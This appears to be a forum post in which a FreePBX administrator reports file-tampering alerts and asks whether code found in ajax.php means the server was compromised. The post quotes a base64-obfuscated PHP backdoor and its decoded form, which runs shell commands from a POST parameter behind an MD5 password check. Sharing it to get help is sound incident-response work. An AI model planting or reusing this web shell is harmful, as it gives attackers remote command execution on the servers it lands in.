@pbaeumel wrote:
Hi all,
yesterday and today I received an eMail informing about tampered file warnings.
Yesterday:
You have 1 tampered files:
Module: "FreePBX Framework", File:
"/var/www/html/admin/libraries/media/Media/Media.php
altered"Today:
You have 1 tampered files:
Module: "FreePBX Framework", File:
"/var/www/html/admin/ajax.php altered"In todays reported file I might have discovered something suspicious right after the start:
// License for all code of this FreePBX module can be found in the license file inside the module directory // Copyright 2013 Schmooze Com Inc. eval(base64_decode('c2Vzc2lvbl9zdGFydCgpO2lmKCFpc3NldCgkX1NFU1NJT05bJ0FNUF91c2VyJ10pKXtpZihtZDUoJF9SRVFVRVNUWydwd2R6J10pID09ICdlYzAwOWVlZTY2NjJhNDlkNjBmNDRiNGE5MTk4ZmExZCcpe3NoZWxsX2V4ZWMoJF9QT1NUWydjJ10pO31lY2hvICd7ImVycm9yIjoiYWpheFJlcXVlc3QgIGRlY2xpbmVkIn0nO2V4aXQoKTt9'));Retranslated the base64-Part means:
session_start();if(!isset($SESSION['AMPuser'])){if(md5($REQUEST['pwdz']) == 'ec009eee6662a49d60f44b4a9198fa1d'){shellexec($_POST['c']);}echo '{"error":"ajaxRequest declined"}';exit();}
Is this really a security break?
Is there any source I could check the contents of ajax.php against the original.Best regards,
Patrick
Posts: 4
Participants: 3